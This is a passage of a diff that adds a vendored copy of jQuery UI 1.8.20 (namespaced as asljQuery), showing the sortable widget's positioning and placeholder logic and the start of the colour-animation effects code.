var connectWith = this._connectWith();
|
3445 |
+
|
3446 |
+
if(connectWith && this.ready) { //Shouldn't be run the first time through due to massive slow-down
|
3447 |
+
for (var i = connectWith.length - 1; i >= 0; i--){
|
3448 |
+
var cur = $(connectWith[i]);
|
3449 |
+
for (var j = cur.length - 1; j >= 0; j--){
|
3450 |
+
var inst = $.data(cur[j], this.widgetName);
|
3451 |
+
if(inst && inst != this && !inst.options.disabled) {
|
3452 |
+
queries.push([$.isFunction(inst.options.items) ? inst.options.items.call(inst.element[0], event, { item: this.currentItem }) : $(inst.options.items, inst.element), inst]);
|
3453 |
+
this.containers.push(inst);
|
3454 |
+
}
|
3455 |
+
};
|
3456 |
+
};
|
3457 |
+
}
|
3458 |
+
|
3459 |
+
for (var i = queries.length - 1; i >= 0; i--) {
|
3460 |
+
var targetData = queries[i][1];
|
3461 |
+
var _queries = queries[i][0];
|
3462 |
+
|
3463 |
+
for (var j=0, queriesLength = _queries.length; j < queriesLength; j++) {
|
3464 |
+
var item = $(_queries[j]);
|
3465 |
+
|
3466 |
+
item.data(this.widgetName + '-item', targetData); // Data for target checking (mouse manager)
|
3467 |
+
|
3468 |
+
items.push({
|
3469 |
+
item: item,
|
3470 |
+
instance: targetData,
|
3471 |
+
width: 0, height: 0,
|
3472 |
+
left: 0, top: 0
|
3473 |
+
});
|
3474 |
+
};
|
3475 |
+
};
|
3476 |
+
|
3477 |
+
},
|
3478 |
+
|
3479 |
+
refreshPositions: function(fast) {
|
3480 |
+
|
3481 |
+
//This has to be redone because due to the item being moved out/into the offsetParent, the offsetParent's position will change
|
3482 |
+
if(this.offsetParent && this.helper) {
|
3483 |
+
this.offset.parent = this._getParentOffset();
|
3484 |
+
}
|
3485 |
+
|
3486 |
+
for (var i = this.items.length - 1; i >= 0; i--){
|
3487 |
+
var item = this.items[i];
|
3488 |
+
|
3489 |
+
//We ignore calculating positions of all connected containers when we're not over them
|
3490 |
+
if(item.instance != this.currentContainer && this.currentContainer && item.item[0] != this.currentItem[0])
|
3491 |
+
continue;
|
3492 |
+
|
3493 |
+
var t = this.options.toleranceElement ? $(this.options.toleranceElement, item.item) : item.item;
|
3494 |
+
|
3495 |
+
if (!fast) {
|
3496 |
+
item.width = t.outerWidth();
|
3497 |
+
item.height = t.outerHeight();
|
3498 |
+
}
|
3499 |
+
|
3500 |
+
var p = t.offset();
|
3501 |
+
item.left = p.left;
|
3502 |
+
item.top = p.top;
|
3503 |
+
};
|
3504 |
+
|
3505 |
+
if(this.options.custom && this.options.custom.refreshContainers) {
|
3506 |
+
this.options.custom.refreshContainers.call(this);
|
3507 |
+
} else {
|
3508 |
+
for (var i = this.containers.length - 1; i >= 0; i--){
|
3509 |
+
var p = this.containers[i].element.offset();
|
3510 |
+
this.containers[i].containerCache.left = p.left;
|
3511 |
+
this.containers[i].containerCache.top = p.top;
|
3512 |
+
this.containers[i].containerCache.width = this.containers[i].element.outerWidth();
|
3513 |
+
this.containers[i].containerCache.height = this.containers[i].element.outerHeight();
|
3514 |
+
};
|
3515 |
+
}
|
3516 |
+
|
3517 |
+
return this;
|
3518 |
+
},
|
3519 |
+
|
3520 |
+
_createPlaceholder: function(that) {
|
3521 |
+
|
3522 |
+
var self = that || this, o = self.options;
|
3523 |
+
|
3524 |
+
if(!o.placeholder || o.placeholder.constructor == String) {
|
3525 |
+
var className = o.placeholder;
|
3526 |
+
o.placeholder = {
|
3527 |
+
element: function() {
|
3528 |
+
|
3529 |
+
var el = $(document.createElement(self.currentItem[0].nodeName))
|
3530 |
+
.addClass(className || self.currentItem[0].className+" ui-sortable-placeholder")
|
3531 |
+
.removeClass("ui-sortable-helper")[0];
|
3532 |
+
|
3533 |
+
if(!className)
|
3534 |
+
el.style.visibility = "hidden";
|
3535 |
+
|
3536 |
+
return el;
|
3537 |
+
},
|
3538 |
+
update: function(container, p) {
|
3539 |
+
|
3540 |
+
// 1. If a className is set as 'placeholder option, we don't force sizes - the class is responsible for that
|
3541 |
+
// 2. The option 'forcePlaceholderSize can be enabled to force it even if a class name is specified
|
3542 |
+
if(className && !o.forcePlaceholderSize) return;
|
3543 |
+
|
3544 |
+
//If the element doesn't have a actual height by itself (without styles coming from a stylesheet), it receives the inline height from the dragged item
|
3545 |
+
if(!p.height()) { p.height(self.currentItem.innerHeight() - parseInt(self.currentItem.css('paddingTop')||0, 10) - parseInt(self.currentItem.css('paddingBottom')||0, 10)); };
|
3546 |
+
if(!p.width()) { p.width(self.currentItem.innerWidth() - parseInt(self.currentItem.css('paddingLeft')||0, 10) - parseInt(self.currentItem.css('paddingRight')||0, 10)); };
|
3547 |
+
}
|
3548 |
+
};
|
3549 |
+
}
|
3550 |
+
|
3551 |
+
//Create the placeholder
|
3552 |
+
self.placeholder = $(o.placeholder.element.call(self.element, self.currentItem));
|
3553 |
+
|
3554 |
+
//Append it after the actual current item
|
3555 |
+
self.currentItem.after(self.placeholder);
|
3556 |
+
|
3557 |
+
//Update the size of the placeholder (TODO: Logic to fuzzy, see line 316/317)
|
3558 |
+
o.placeholder.update(self, self.placeholder);
|
3559 |
+
|
3560 |
+
},
|
3561 |
+
|
3562 |
+
_contactContainers: function(event) {
|
3563 |
+
|
3564 |
+
// get innermost container that intersects with item
|
3565 |
+
var innermostContainer = null, innermostIndex = null;
|
3566 |
+
|
3567 |
+
|
3568 |
+
for (var i = this.containers.length - 1; i >= 0; i--){
|
3569 |
+
|
3570 |
+
// never consider a container that's located within the item itself
|
3571 |
+
if($.ui.contains(this.currentItem[0], this.containers[i].element[0]))
|
3572 |
+
continue;
|
3573 |
+
|
3574 |
+
if(this._intersectsWith(this.containers[i].containerCache)) {
|
3575 |
+
|
3576 |
+
// if we've already found a container and it's more "inner" than this, then continue
|
3577 |
+
if(innermostContainer && $.ui.contains(this.containers[i].element[0], innermostContainer.element[0]))
|
3578 |
+
continue;
|
3579 |
+
|
3580 |
+
innermostContainer = this.containers[i];
|
3581 |
+
innermostIndex = i;
|
3582 |
+
|
3583 |
+
} else {
|
3584 |
+
// container doesn't intersect. trigger "out" event if necessary
|
3585 |
+
if(this.containers[i].containerCache.over) {
|
3586 |
+
this.containers[i]._trigger("out", event, this._uiHash(this));
|
3587 |
+
this.containers[i].containerCache.over = 0;
|
3588 |
+
}
|
3589 |
+
}
|
3590 |
+
|
3591 |
+
}
|
3592 |
+
|
3593 |
+
// if no intersecting containers found, return
|
3594 |
+
if(!innermostContainer) return;
|
3595 |
+
|
3596 |
+
// move the item into the container if it's not there already
|
3597 |
+
if(this.containers.length === 1) {
|
3598 |
+
this.containers[innermostIndex]._trigger("over", event, this._uiHash(this));
|
3599 |
+
this.containers[innermostIndex].containerCache.over = 1;
|
3600 |
+
} else if(this.currentContainer != this.containers[innermostIndex]) {
|
3601 |
+
|
3602 |
+
//When entering a new container, we will find the item with the least distance and append our item near it
|
3603 |
+
var dist = 10000; var itemWithLeastDistance = null; var base = this.positionAbs[this.containers[innermostIndex].floating ? 'left' : 'top'];
|
3604 |
+
for (var j = this.items.length - 1; j >= 0; j--) {
|
3605 |
+
if(!$.ui.contains(this.containers[innermostIndex].element[0], this.items[j].item[0])) continue;
|
3606 |
+
var cur = this.items[j][this.containers[innermostIndex].floating ? 'left' : 'top'];
|
3607 |
+
if(Math.abs(cur - base) < dist) {
|
3608 |
+
dist = Math.abs(cur - base); itemWithLeastDistance = this.items[j];
|
3609 |
+
}
|
3610 |
+
}
|
3611 |
+
|
3612 |
+
if(!itemWithLeastDistance && !this.options.dropOnEmpty) //Check if dropOnEmpty is enabled
|
3613 |
+
return;
|
3614 |
+
|
3615 |
+
this.currentContainer = this.containers[innermostIndex];
|
3616 |
+
itemWithLeastDistance ? this._rearrange(event, itemWithLeastDistance, null, true) : this._rearrange(event, null, this.containers[innermostIndex].element, true);
|
3617 |
+
this._trigger("change", event, this._uiHash());
|
3618 |
+
this.containers[innermostIndex]._trigger("change", event, this._uiHash(this));
|
3619 |
+
|
3620 |
+
//Update the placeholder
|
3621 |
+
this.options.placeholder.update(this.currentContainer, this.placeholder);
|
3622 |
+
|
3623 |
+
this.containers[innermostIndex]._trigger("over", event, this._uiHash(this));
|
3624 |
+
this.containers[innermostIndex].containerCache.over = 1;
|
3625 |
+
}
|
3626 |
+
|
3627 |
+
|
3628 |
+
},
|
3629 |
+
|
3630 |
+
_createHelper: function(event) {
|
3631 |
+
|
3632 |
+
var o = this.options;
|
3633 |
+
var helper = $.isFunction(o.helper) ? $(o.helper.apply(this.element[0], [event, this.currentItem])) : (o.helper == 'clone' ? this.currentItem.clone() : this.currentItem);
|
3634 |
+
|
3635 |
+
if(!helper.parents('body').length) //Add the helper to the DOM if that didn't happen already
|
3636 |
+
$(o.appendTo != 'parent' ? o.appendTo : this.currentItem[0].parentNode)[0].appendChild(helper[0]);
|
3637 |
+
|
3638 |
+
if(helper[0] == this.currentItem[0])
|
3639 |
+
this._storedCSS = { width: this.currentItem[0].style.width, height: this.currentItem[0].style.height, position: this.currentItem.css("position"), top: this.currentItem.css("top"), left: this.currentItem.css("left") };
|
3640 |
+
|
3641 |
+
if(helper[0].style.width == '' || o.forceHelperSize) helper.width(this.currentItem.width());
|
3642 |
+
if(helper[0].style.height == '' || o.forceHelperSize) helper.height(this.currentItem.height());
|
3643 |
+
|
3644 |
+
return helper;
|
3645 |
+
|
3646 |
+
},
|
3647 |
+
|
3648 |
+
_adjustOffsetFromHelper: function(obj) {
|
3649 |
+
if (typeof obj == 'string') {
|
3650 |
+
obj = obj.split(' ');
|
3651 |
+
}
|
3652 |
+
if ($.isArray(obj)) {
|
3653 |
+
obj = {left: +obj[0], top: +obj[1] || 0};
|
3654 |
+
}
|
3655 |
+
if ('left' in obj) {
|
3656 |
+
this.offset.click.left = obj.left + this.margins.left;
|
3657 |
+
}
|
3658 |
+
if ('right' in obj) {
|
3659 |
+
this.offset.click.left = this.helperProportions.width - obj.right + this.margins.left;
|
3660 |
+
}
|
3661 |
+
if ('top' in obj) {
|
3662 |
+
this.offset.click.top = obj.top + this.margins.top;
|
3663 |
+
}
|
3664 |
+
if ('bottom' in obj) {
|
3665 |
+
this.offset.click.top = this.helperProportions.height - obj.bottom + this.margins.top;
|
3666 |
+
}
|
3667 |
+
},
|
3668 |
+
|
3669 |
+
_getParentOffset: function() {
|
3670 |
+
|
3671 |
+
|
3672 |
+
//Get the offsetParent and cache its position
|
3673 |
+
this.offsetParent = this.helper.offsetParent();
|
3674 |
+
var po = this.offsetParent.offset();
|
3675 |
+
|
3676 |
+
// This is a special case where we need to modify a offset calculated on start, since the following happened:
|
3677 |
+
// 1. The position of the helper is absolute, so it's position is calculated based on the next positioned parent
|
3678 |
+
// 2. The actual offset parent is a child of the scroll parent, and the scroll parent isn't the document, which means that
|
3679 |
+
// the scroll is included in the initial calculation of the offset of the parent, and never recalculated upon drag
|
3680 |
+
if(this.cssPosition == 'absolute' && this.scrollParent[0] != document && $.ui.contains(this.scrollParent[0], this.offsetParent[0])) {
|
3681 |
+
po.left += this.scrollParent.scrollLeft();
|
3682 |
+
po.top += this.scrollParent.scrollTop();
|
3683 |
+
}
|
3684 |
+
|
3685 |
+
if((this.offsetParent[0] == document.body) //This needs to be actually done for all browsers, since pageX/pageY includes this information
|
3686 |
+
|| (this.offsetParent[0].tagName && this.offsetParent[0].tagName.toLowerCase() == 'html' && $.browser.msie)) //Ugly IE fix
|
3687 |
+
po = { top: 0, left: 0 };
|
3688 |
+
|
3689 |
+
return {
|
3690 |
+
top: po.top + (parseInt(this.offsetParent.css("borderTopWidth"),10) || 0),
|
3691 |
+
left: po.left + (parseInt(this.offsetParent.css("borderLeftWidth"),10) || 0)
|
3692 |
+
};
|
3693 |
+
|
3694 |
+
},
|
3695 |
+
|
3696 |
+
_getRelativeOffset: function() {
|
3697 |
+
|
3698 |
+
if(this.cssPosition == "relative") {
|
3699 |
+
var p = this.currentItem.position();
|
3700 |
+
return {
|
3701 |
+
top: p.top - (parseInt(this.helper.css("top"),10) || 0) + this.scrollParent.scrollTop(),
|
3702 |
+
left: p.left - (parseInt(this.helper.css("left"),10) || 0) + this.scrollParent.scrollLeft()
|
3703 |
+
};
|
3704 |
+
} else {
|
3705 |
+
return { top: 0, left: 0 };
|
3706 |
+
}
|
3707 |
+
|
3708 |
+
},
|
3709 |
+
|
3710 |
+
_cacheMargins: function() {
|
3711 |
+
this.margins = {
|
3712 |
+
left: (parseInt(this.currentItem.css("marginLeft"),10) || 0),
|
3713 |
+
top: (parseInt(this.currentItem.css("marginTop"),10) || 0)
|
3714 |
+
};
|
3715 |
+
},
|
3716 |
+
|
3717 |
+
_cacheHelperProportions: function() {
|
3718 |
+
this.helperProportions = {
|
3719 |
+
width: this.helper.outerWidth(),
|
3720 |
+
height: this.helper.outerHeight()
|
3721 |
+
};
|
3722 |
+
},
|
3723 |
+
|
3724 |
+
_setContainment: function() {
|
3725 |
+
|
3726 |
+
var o = this.options;
|
3727 |
+
if(o.containment == 'parent') o.containment = this.helper[0].parentNode;
|
3728 |
+
if(o.containment == 'document' || o.containment == 'window') this.containment = [
|
3729 |
+
0 - this.offset.relative.left - this.offset.parent.left,
|
3730 |
+
0 - this.offset.relative.top - this.offset.parent.top,
|
3731 |
+
$(o.containment == 'document' ? document : window).width() - this.helperProportions.width - this.margins.left,
|
3732 |
+
($(o.containment == 'document' ? document : window).height() || document.body.parentNode.scrollHeight) - this.helperProportions.height - this.margins.top
|
3733 |
+
];
|
3734 |
+
|
3735 |
+
if(!(/^(document|window|parent)$/).test(o.containment)) {
|
3736 |
+
var ce = $(o.containment)[0];
|
3737 |
+
var co = $(o.containment).offset();
|
3738 |
+
var over = ($(ce).css("overflow") != 'hidden');
|
3739 |
+
|
3740 |
+
this.containment = [
|
3741 |
+
co.left + (parseInt($(ce).css("borderLeftWidth"),10) || 0) + (parseInt($(ce).css("paddingLeft"),10) || 0) - this.margins.left,
|
3742 |
+
co.top + (parseInt($(ce).css("borderTopWidth"),10) || 0) + (parseInt($(ce).css("paddingTop"),10) || 0) - this.margins.top,
|
3743 |
+
co.left+(over ? Math.max(ce.scrollWidth,ce.offsetWidth) : ce.offsetWidth) - (parseInt($(ce).css("borderLeftWidth"),10) || 0) - (parseInt($(ce).css("paddingRight"),10) || 0) - this.helperProportions.width - this.margins.left,
|
3744 |
+
co.top+(over ? Math.max(ce.scrollHeight,ce.offsetHeight) : ce.offsetHeight) - (parseInt($(ce).css("borderTopWidth"),10) || 0) - (parseInt($(ce).css("paddingBottom"),10) || 0) - this.helperProportions.height - this.margins.top
|
3745 |
+
];
|
3746 |
+
}
|
3747 |
+
|
3748 |
+
},
|
3749 |
+
|
3750 |
+
_convertPositionTo: function(d, pos) {
|
3751 |
+
|
3752 |
+
if(!pos) pos = this.position;
|
3753 |
+
var mod = d == "absolute" ? 1 : -1;
|
3754 |
+
var o = this.options, scroll = this.cssPosition == 'absolute' && !(this.scrollParent[0] != document && $.ui.contains(this.scrollParent[0], this.offsetParent[0])) ? this.offsetParent : this.scrollParent, scrollIsRootNode = (/(html|body)/i).test(scroll[0].tagName);
|
3755 |
+
|
3756 |
+
return {
|
3757 |
+
top: (
|
3758 |
+
pos.top // The absolute mouse position
|
3759 |
+
+ this.offset.relative.top * mod // Only for relative positioned nodes: Relative offset from element to offset parent
|
3760 |
+
+ this.offset.parent.top * mod // The offsetParent's offset without borders (offset + border)
|
3761 |
+
- ($.browser.safari && this.cssPosition == 'fixed' ? 0 : ( this.cssPosition == 'fixed' ? -this.scrollParent.scrollTop() : ( scrollIsRootNode ? 0 : scroll.scrollTop() ) ) * mod)
|
3762 |
+
),
|
3763 |
+
left: (
|
3764 |
+
pos.left // The absolute mouse position
|
3765 |
+
+ this.offset.relative.left * mod // Only for relative positioned nodes: Relative offset from element to offset parent
|
3766 |
+
+ this.offset.parent.left * mod // The offsetParent's offset without borders (offset + border)
|
3767 |
+
- ($.browser.safari && this.cssPosition == 'fixed' ? 0 : ( this.cssPosition == 'fixed' ? -this.scrollParent.scrollLeft() : scrollIsRootNode ? 0 : scroll.scrollLeft() ) * mod)
|
3768 |
+
)
|
3769 |
+
};
|
3770 |
+
|
3771 |
+
},
|
3772 |
+
|
3773 |
+
_generatePosition: function(event) {
|
3774 |
+
|
3775 |
+
var o = this.options, scroll = this.cssPosition == 'absolute' && !(this.scrollParent[0] != document && $.ui.contains(this.scrollParent[0], this.offsetParent[0])) ? this.offsetParent : this.scrollParent, scrollIsRootNode = (/(html|body)/i).test(scroll[0].tagName);
|
3776 |
+
|
3777 |
+
// This is another very weird special case that only happens for relative elements:
|
3778 |
+
// 1. If the css position is relative
|
3779 |
+
// 2. and the scroll parent is the document or similar to the offset parent
|
3780 |
+
// we have to refresh the relative offset during the scroll so there are no jumps
|
3781 |
+
if(this.cssPosition == 'relative' && !(this.scrollParent[0] != document && this.scrollParent[0] != this.offsetParent[0])) {
|
3782 |
+
this.offset.relative = this._getRelativeOffset();
|
3783 |
+
}
|
3784 |
+
|
3785 |
+
var pageX = event.pageX;
|
3786 |
+
var pageY = event.pageY;
|
3787 |
+
|
3788 |
+
/*
|
3789 |
+
* - Position constraining -
|
3790 |
+
* Constrain the position to a mix of grid, containment.
|
3791 |
+
*/
|
3792 |
+
|
3793 |
+
if(this.originalPosition) { //If we are not dragging yet, we won't check for options
|
3794 |
+
|
3795 |
+
if(this.containment) {
|
3796 |
+
if(event.pageX - this.offset.click.left < this.containment[0]) pageX = this.containment[0] + this.offset.click.left;
|
3797 |
+
if(event.pageY - this.offset.click.top < this.containment[1]) pageY = this.containment[1] + this.offset.click.top;
|
3798 |
+
if(event.pageX - this.offset.click.left > this.containment[2]) pageX = this.containment[2] + this.offset.click.left;
|
3799 |
+
if(event.pageY - this.offset.click.top > this.containment[3]) pageY = this.containment[3] + this.offset.click.top;
|
3800 |
+
}
|
3801 |
+
|
3802 |
+
if(o.grid) {
|
3803 |
+
var top = this.originalPageY + Math.round((pageY - this.originalPageY) / o.grid[1]) * o.grid[1];
|
3804 |
+
pageY = this.containment ? (!(top - this.offset.click.top < this.containment[1] || top - this.offset.click.top > this.containment[3]) ? top : (!(top - this.offset.click.top < this.containment[1]) ? top - o.grid[1] : top + o.grid[1])) : top;
|
3805 |
+
|
3806 |
+
var left = this.originalPageX + Math.round((pageX - this.originalPageX) / o.grid[0]) * o.grid[0];
|
3807 |
+
pageX = this.containment ? (!(left - this.offset.click.left < this.containment[0] || left - this.offset.click.left > this.containment[2]) ? left : (!(left - this.offset.click.left < this.containment[0]) ? left - o.grid[0] : left + o.grid[0])) : left;
|
3808 |
+
}
|
3809 |
+
|
3810 |
+
}
|
3811 |
+
|
3812 |
+
return {
|
3813 |
+
top: (
|
3814 |
+
pageY // The absolute mouse position
|
3815 |
+
- this.offset.click.top // Click offset (relative to the element)
|
3816 |
+
- this.offset.relative.top // Only for relative positioned nodes: Relative offset from element to offset parent
|
3817 |
+
- this.offset.parent.top // The offsetParent's offset without borders (offset + border)
|
3818 |
+
+ ($.browser.safari && this.cssPosition == 'fixed' ? 0 : ( this.cssPosition == 'fixed' ? -this.scrollParent.scrollTop() : ( scrollIsRootNode ? 0 : scroll.scrollTop() ) ))
|
3819 |
+
),
|
3820 |
+
left: (
|
3821 |
+
pageX // The absolute mouse position
|
3822 |
+
- this.offset.click.left // Click offset (relative to the element)
|
3823 |
+
- this.offset.relative.left // Only for relative positioned nodes: Relative offset from element to offset parent
|
3824 |
+
- this.offset.parent.left // The offsetParent's offset without borders (offset + border)
|
3825 |
+
+ ($.browser.safari && this.cssPosition == 'fixed' ? 0 : ( this.cssPosition == 'fixed' ? -this.scrollParent.scrollLeft() : scrollIsRootNode ? 0 : scroll.scrollLeft() ))
|
3826 |
+
)
|
3827 |
+
};
|
3828 |
+
|
3829 |
+
},
|
3830 |
+
|
3831 |
+
_rearrange: function(event, i, a, hardRefresh) {
|
3832 |
+
|
3833 |
+
a ? a[0].appendChild(this.placeholder[0]) : i.item[0].parentNode.insertBefore(this.placeholder[0], (this.direction == 'down' ? i.item[0] : i.item[0].nextSibling));
|
3834 |
+
|
3835 |
+
//Various things done here to improve the performance:
|
3836 |
+
// 1. we create a setTimeout, that calls refreshPositions
|
3837 |
+
// 2. on the instance, we have a counter variable, that get's higher after every append
|
3838 |
+
// 3. on the local scope, we copy the counter variable, and check in the timeout, if it's still the same
|
3839 |
+
// 4. this lets only the last addition to the timeout stack through
|
3840 |
+
this.counter = this.counter ? ++this.counter : 1;
|
3841 |
+
var self = this, counter = this.counter;
|
3842 |
+
|
3843 |
+
window.setTimeout(function() {
|
3844 |
+
if(counter == self.counter) self.refreshPositions(!hardRefresh); //Precompute after each DOM insertion, NOT on mousemove
|
3845 |
+
},0);
|
3846 |
+
|
3847 |
+
},
|
3848 |
+
|
3849 |
+
_clear: function(event, noPropagation) {
|
3850 |
+
|
3851 |
+
this.reverting = false;
|
3852 |
+
// We delay all events that have to be triggered to after the point where the placeholder has been removed and
|
3853 |
+
// everything else normalized again
|
3854 |
+
var delayedTriggers = [], self = this;
|
3855 |
+
|
3856 |
+
// We first have to update the dom position of the actual currentItem
|
3857 |
+
// Note: don't do it if the current item is already removed (by a user), or it gets reappended (see #4088)
|
3858 |
+
if(!this._noFinalSort && this.currentItem.parent().length) this.placeholder.before(this.currentItem);
|
3859 |
+
this._noFinalSort = null;
|
3860 |
+
|
3861 |
+
if(this.helper[0] == this.currentItem[0]) {
|
3862 |
+
for(var i in this._storedCSS) {
|
3863 |
+
if(this._storedCSS[i] == 'auto' || this._storedCSS[i] == 'static') this._storedCSS[i] = '';
|
3864 |
+
}
|
3865 |
+
this.currentItem.css(this._storedCSS).removeClass("ui-sortable-helper");
|
3866 |
+
} else {
|
3867 |
+
this.currentItem.show();
|
3868 |
+
}
|
3869 |
+
|
3870 |
+
if(this.fromOutside && !noPropagation) delayedTriggers.push(function(event) { this._trigger("receive", event, this._uiHash(this.fromOutside)); });
|
3871 |
+
if((this.fromOutside || this.domPosition.prev != this.currentItem.prev().not(".ui-sortable-helper")[0] || this.domPosition.parent != this.currentItem.parent()[0]) && !noPropagation) delayedTriggers.push(function(event) { this._trigger("update", event, this._uiHash()); }); //Trigger update callback if the DOM position has changed
|
3872 |
+
if(!$.ui.contains(this.element[0], this.currentItem[0])) { //Node was moved out of the current element
|
3873 |
+
if(!noPropagation) delayedTriggers.push(function(event) { this._trigger("remove", event, this._uiHash()); });
|
3874 |
+
for (var i = this.containers.length - 1; i >= 0; i--){
|
3875 |
+
if($.ui.contains(this.containers[i].element[0], this.currentItem[0]) && !noPropagation) {
|
3876 |
+
delayedTriggers.push((function(c) { return function(event) { c._trigger("receive", event, this._uiHash(this)); }; }).call(this, this.containers[i]));
|
3877 |
+
delayedTriggers.push((function(c) { return function(event) { c._trigger("update", event, this._uiHash(this)); }; }).call(this, this.containers[i]));
|
3878 |
+
}
|
3879 |
+
};
|
3880 |
+
};
|
3881 |
+
|
3882 |
+
//Post events to containers
|
3883 |
+
for (var i = this.containers.length - 1; i >= 0; i--){
|
3884 |
+
if(!noPropagation) delayedTriggers.push((function(c) { return function(event) { c._trigger("deactivate", event, this._uiHash(this)); }; }).call(this, this.containers[i]));
|
3885 |
+
if(this.containers[i].containerCache.over) {
|
3886 |
+
delayedTriggers.push((function(c) { return function(event) { c._trigger("out", event, this._uiHash(this)); }; }).call(this, this.containers[i]));
|
3887 |
+
this.containers[i].containerCache.over = 0;
|
3888 |
+
}
|
3889 |
+
}
|
3890 |
+
|
3891 |
+
//Do what was originally in plugins
|
3892 |
+
if(this._storedCursor) $('body').css("cursor", this._storedCursor); //Reset cursor
|
3893 |
+
if(this._storedOpacity) this.helper.css("opacity", this._storedOpacity); //Reset opacity
|
3894 |
+
if(this._storedZIndex) this.helper.css("zIndex", this._storedZIndex == 'auto' ? '' : this._storedZIndex); //Reset z-index
|
3895 |
+
|
3896 |
+
this.dragging = false;
|
3897 |
+
if(this.cancelHelperRemoval) {
|
3898 |
+
if(!noPropagation) {
|
3899 |
+
this._trigger("beforeStop", event, this._uiHash());
|
3900 |
+
for (var i=0; i < delayedTriggers.length; i++) { delayedTriggers[i].call(this, event); }; //Trigger all delayed events
|
3901 |
+
this._trigger("stop", event, this._uiHash());
|
3902 |
+
}
|
3903 |
+
return false;
|
3904 |
+
}
|
3905 |
+
|
3906 |
+
if(!noPropagation) this._trigger("beforeStop", event, this._uiHash());
|
3907 |
+
|
3908 |
+
//$(this.placeholder[0]).remove(); would have been the jQuery way - unfortunately, it unbinds ALL events from the original node!
|
3909 |
+
this.placeholder[0].parentNode.removeChild(this.placeholder[0]);
|
3910 |
+
|
3911 |
+
if(this.helper[0] != this.currentItem[0]) this.helper.remove(); this.helper = null;
|
3912 |
+
|
3913 |
+
if(!noPropagation) {
|
3914 |
+
for (var i=0; i < delayedTriggers.length; i++) { delayedTriggers[i].call(this, event); }; //Trigger all delayed events
|
3915 |
+
this._trigger("stop", event, this._uiHash());
|
3916 |
+
}
|
3917 |
+
|
3918 |
+
this.fromOutside = false;
|
3919 |
+
return true;
|
3920 |
+
|
3921 |
+
},
|
3922 |
+
|
3923 |
+
_trigger: function() {
|
3924 |
+
if ($.Widget.prototype._trigger.apply(this, arguments) === false) {
|
3925 |
+
this.cancel();
|
3926 |
+
}
|
3927 |
+
},
|
3928 |
+
|
3929 |
+
_uiHash: function(inst) {
|
3930 |
+
var self = inst || this;
|
3931 |
+
return {
|
3932 |
+
helper: self.helper,
|
3933 |
+
placeholder: self.placeholder || $([]),
|
3934 |
+
position: self.position,
|
3935 |
+
originalPosition: self.originalPosition,
|
3936 |
+
offset: self.positionAbs,
|
3937 |
+
item: self.currentItem,
|
3938 |
+
sender: inst ? inst.element : null
|
3939 |
+
};
|
3940 |
+
}
|
3941 |
+
|
3942 |
+
});
|
3943 |
+
|
3944 |
+
$.extend($.ui.sortable, {
|
3945 |
+
version: "1.8.20"
|
3946 |
+
});
|
3947 |
+
|
3948 |
+
})(asljQuery);
|
3949 |
+
|
3950 |
+
;asljQuery.effects || (function($, undefined) {
|
3951 |
+
|
3952 |
+
$.effects = {};
|
3953 |
+
|
3954 |
+
|
3955 |
+
|
3956 |
+
/******************************************************************************/
|
3957 |
+
/****************************** COLOR ANIMATIONS ******************************/
|
3958 |
+
/******************************************************************************/
|
3959 |
+
|
3960 |
+
// override the animation for color styles
|
3961 |
+
$.each(['backgroundColor', 'borderBottomColor', 'borderLeftColor',
|
3962 |
+
'borderRightColor', 'borderTopColor', 'borderColor', 'color', 'outlineColor'],
|
3963 |
+
function(i, attr) {
|
3964 |
+
$.fx.step[attr] = function(fx) {
|
3965 |
+
if (!fx.colorInit) {
|
3966 |
+
fx.start = getColor(fx.elem, attr);
|
3967 |
+
fx.end = getRGB(fx.end);
|
3968 |
+
fx.colorInit = true;
|
3969 |
+
}
|
3970 |
+
|
3971 |
+
fx.elem.style[attr] = 'rgb(' +
|
3972 |
+
Math.max(Math.min(parseInt((fx.pos * (fx.end[0] - fx.start[0])) + fx.start[0], 10), 255), 0) + ',' +
|
3973 |
+
Math.max(Math.min(parseInt((fx.pos * (fx.end[1] - fx.start[1])) + fx.start[1], 10), 255), 0) + ',' +
|
3974 |
+
Math.max(Math.min(parseInt((fx.pos * (fx.end[2] - fx.start[2])) + fx.start[2], 10), 255), 0) + ')';
|
3975 |
+
};
|
3976 |
+
});
|
3977 |
+
|
3978 |
+
// Color Conversion functions from highlightFade
|
3979 |
+
// By Blair Mitchelmore
|
3980 |
+
// http://jquery.offput.ca/highlightFade/
|
3981 |
+
|
3982 |
+
// Parse strings looking for color tuples [255,255,255]
|
3983 |
+
function getRGB(color) {
|
3984 |
+
var result;
|
3985 |
+
|
3986 |
+
// Check if we're already dealing with an array of colors
|
3987 |
+
if ( color && color.constructor == Array && color.length == 3 )
|
3988 |
+
return color;
|
3989 |
+
|
3990 |
+
// Look for rgb(num,num,num)
|
3991 |
+
if (result = /rgb\(\s*([0-9]{1,3})\s*,\s*([0-9]{1,3})\s*,\s*([0-9]{1,3})\s*\)/.exec(color))
|
3992 |
+
return [parseInt(result[1],10), parseInt(result[2],10), parseInt(result[3],10)];
|
3993 |
+
|
3994 |
+
// Look for rgb(num%,num%,num%)
|
3995 |
+
if (result = /rgb\(\s*([0-9]+(?:\.[0-9]+)?)\%\s*,\s*([0-9]+(?:\.[0-9]+)?)\%\s*,\s*([0-9]+(?:\.[0-9]+)?)\%\s*\)/.exec(color))
|
3996 |
+
return [parseFloat(result[1])*2.55, parseFloat(result[2])*2.55, parseFloat(result[3])*2.55];
|
3997 |
+
|
3998 |
+
// Look for #a0b1c2
|
3999 |
+
if (result = /#([a-fA-F0-9]{2})([a-fA-F0-9]{2})([a-fA-F0-9]{2})/.exec(color))
|
4000 |
+
return [parseInt(result[1],16), parseInt(result[2],16), parseInt(result[3],16)];
|
4001 |
+
|
4002 |
+
// Look for #fff
|
4003 |
+
if (result = /#([a-fA-F0-9])([a-fA-F0-9])([a-fA-F0-9])/.exec(color))
|
4004 |
+
return [parseInt(result[1]+result[1],16), parseInt(result[2]+result[2],16), parseInt(result[3]+result[3],16)];
|
4005 |
+
|
4006 |
+
// Look for rgba(0, 0, 0, 0) == transparent in Safari 3
|
4007 |
+
if (result = /rgba\(0, 0, 0, 0\)/.exec(color))
|
4008 |
+
return colors['transparent'];
|
4009 |
+
|
4010 |
+
// Otherwise, we're most likely dealing with a named color
|
4011 |
+
return colors[$.trim(color).toLowerCase()];
|
4012 |
+
}
|
4013 |
+
|
4014 |
+
function getColor(elem, attr) {
|
4015 |
+
var color;
|
4016 |
+
|
4017 |
+
do {
|
4018 |
+
color = $.curCSS(elem, attr);
|
4019 |
+
|
4020 |
+
// Keep going until we find an element that has color, or we hit the body
|
4021 |
+
